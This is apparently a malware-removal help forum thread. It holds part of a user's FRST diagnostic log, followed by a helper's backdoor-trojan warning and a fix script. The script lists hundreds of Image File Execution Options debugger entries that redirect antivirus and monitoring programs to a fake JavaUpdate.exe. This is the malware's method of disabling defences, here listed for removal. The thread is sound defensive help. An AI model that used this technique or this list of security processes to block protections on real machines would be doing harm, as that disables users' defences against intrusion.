Fault offset: 0x00000000
Faulting process id: 0x73c
Faulting application start time: 0x01d226774e839f23
Faulting application path: C:\Windows\SysWOW64\CMD.EXE
Faulting module path: unknown
Report Id: 985e74aa-926a-11e6-977c-cdbe39bc9798


System errors:
=============
Error: (10/15/2016 12:42:56 PM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk2\DR9.

Error: (10/15/2016 12:38:09 PM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk2\DR8.

Error: (10/14/2016 09:00:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The MBAMService service failed to start due to the following error:
The system cannot find the file specified.

Error: (10/14/2016 09:00:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The MBAMScheduler service failed to start due to the following error:
The system cannot find the file specified.

Error: (10/14/2016 08:55:47 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The PnP-X IP Bus Enumerator service depends on the Function Discovery Provider Host service which failed to start because of the following error:
The dependency service or group failed to start.

Error: (10/14/2016 08:55:33 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server:
{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (10/14/2016 08:55:19 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The WinHTTP Web Proxy Auto-Discovery Service service depends on the DHCP Client service which failed to start because of the following error:
The dependency service or group failed to start.

Error: (10/14/2016 08:53:47 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
NetBIOS
NetBT
nsiproxy
Psched
rdbss
spldr
tdx
vwififlt
Wanarpv6
WfpLwf
ws2ifsl

Error: (10/14/2016 08:53:45 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network Location Awareness service depends on the Network Store Interface Service service which failed to start because of the following error:
The dependency service or group failed to start.

Error: (10/14/2016 08:53:45 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The SMB 2.0 MiniRedirector service depends on the SMB MiniRedirector Wrapper and Engine service which failed to start because of the following error:
The dependency service or group failed to start.


CodeIntegrity:
===================================
  Date: 2014-05-14 20:19:40.671
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:40.562
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:40.452
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.955
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.814
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.674
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.518
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.268
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-14 20:19:38.066
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume14\Windows\explorer.exe because the set of per-page image hashes could not be found on the system.

  Date: 2013-06-17 11:21:47.370
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume1\recovery\recup_dir.4\f0082656.exe because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core™ i3-4130 CPU @ 3.40GHz
Percentage of memory in use: 65%
Total physical RAM: 4000.09 MB
Available physical RAM: 1387.46 MB
Total Virtual: 7998.37 MB
Available Virtual: 5356.86 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.66 GB) (Free:79.68 GB) NTFS
Drive e: () (Fixed) (Total:931.51 GB) (Free:153.7 GB) NTFS
Drive z: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 1BC070FA)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 84AEB39B)

Partition: GPT.

==================== End of Addition.txt ============================



#4 TsVk!

Posted 21 October 2016 - 01:20 AM

Hi jumpman17,

BACKDOOR WARNING!
 

One or more of the identified infections is a Backdoor Trojan.

This allows hackers to remotely control your computer, steal critical system information and download and execute files.

Though the trojan has been identified and can be killed, because of its backdoor functionality your PC is very likely compromised and there is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan the best course of action would be a reformat and reinstall of the OS. Please read these for more information:

How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall?

 

If you don't want to go that route...

If you have done any online banking on the machine in question, I recommend you take steps to preserve your bank account's integrity.

  • contact your bank and check for fraudulent transfers, place your accounts on fraud watch
  • get your credit cards re-issued
  • change all your online passwords, from a different secure computer.

If not, it is still highly recommended that you change your

  • email passwords
  • social networking passwords
  • other sensitive and financial website passwords

from a different secure computer.

We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. Let me know what you decide to do. If you decide to go through with the cleanup, please proceed with the following steps.

 

--------------------

Torrent Warning!

Torrent software often contains malware and other nasties. It's up to you whether you want to run the risk by keeping this software on your machine, but I ask you not to run any torrent transfers until we are finished please.

--------------------

Please create a new text file located in the same directory as FRST.exe, copy these lines into it and then save it.

HKLM-x32\...\Run: [] => [X]

IFEO: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\acs.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareDesktop.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\adoronsfirewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AgentSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\alertwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ALMon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ALsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\alupdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AntiHook.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\app_firewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\apvxdwin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\armorwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\as3pf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\asr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\aupdrun.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\authfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avas.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AvastSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AvastUi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avcom.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVK.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKProxy.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avkwctl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKWCtlx64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avkwctrl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avmgma.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avpmapp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avtask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\aws.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\backgroundscanclient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Bav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bavhm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavUpdater.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavWebClient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BDSSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bgctl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bgnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BgScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blackd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blackice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blinksvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bootsafe.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuardUpdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuarScanner.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\capinfos.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavApp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cavasm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavAUD.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavCons.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavEmSrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavmr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavMud.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavoar.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavQ.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavSn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavSub.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavUMAS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavUserUpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavvl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cavwp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdas17.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdas2.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdinstx.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CEmRep.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cis.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CisTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\clamd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\clamscan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ClamTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ClamWin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cmdagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cmgrdian.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\configmgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\configuresav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CONSCTLX.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\coreFrameworkHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\coreServiceShell.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\csi-eui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CV.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\DCSUserProt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dlservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dltray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dragon_updater.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dumpcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dvpapi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dwengine.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\econceal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\econser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\editcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ekern.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ekrn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\emlproui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\EMLPROXY.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\endtaskpro.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\escanmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\escanpro.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\espwatch.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Ethereal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fameh32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fgui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\filedeleter.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\filemon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewall2004.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewallgui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FPAVServer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FProtTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FPWin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\freshclam.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\freshclamwrap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsgk32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSHDLL64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fshoster32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSM32.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSMA32.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsorsp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsrt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fssm32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fwsrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\gateway.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDKBFltExe32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDSC.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GpChromeDatabasegInx64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\guardxkickoff_x64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\guardxservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\hpf_.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\iface.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\InstLsp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\invent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipatrol.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipcserver.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipctray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\iptray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7AVScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7CrvSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7EmlPxy.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7FWSrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7PSSrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7RTScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7SysMon.Exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSecurity.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSMngr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kpf4gui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kpf4ss.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\licwiz.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Lite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\LittleHook.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\livehelp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\lookout.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\lpfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbam.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbamscheduler.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbamservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mcods.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCS-Uninstall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldCCC.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldDS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldRTM.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mcvsescn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mergecap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MpCmdRun.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mpf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mpfcm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MpUXSrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MSASCui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\msconfig.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MsMpEng.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\msseces.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MWAGENT.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MWASER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nanoav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nanosvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\navapsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nbrowser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netguard: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\netguardlite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nfservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\njeeves2.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nnf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nod32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nod32krn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nprosec.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\NS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nseupdatesvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nstzerospywarelite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvcod.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvcsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvoy.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nwscmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\oasclnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\omnitray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\OnAccessInstaller.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ONLINENT.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\opf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
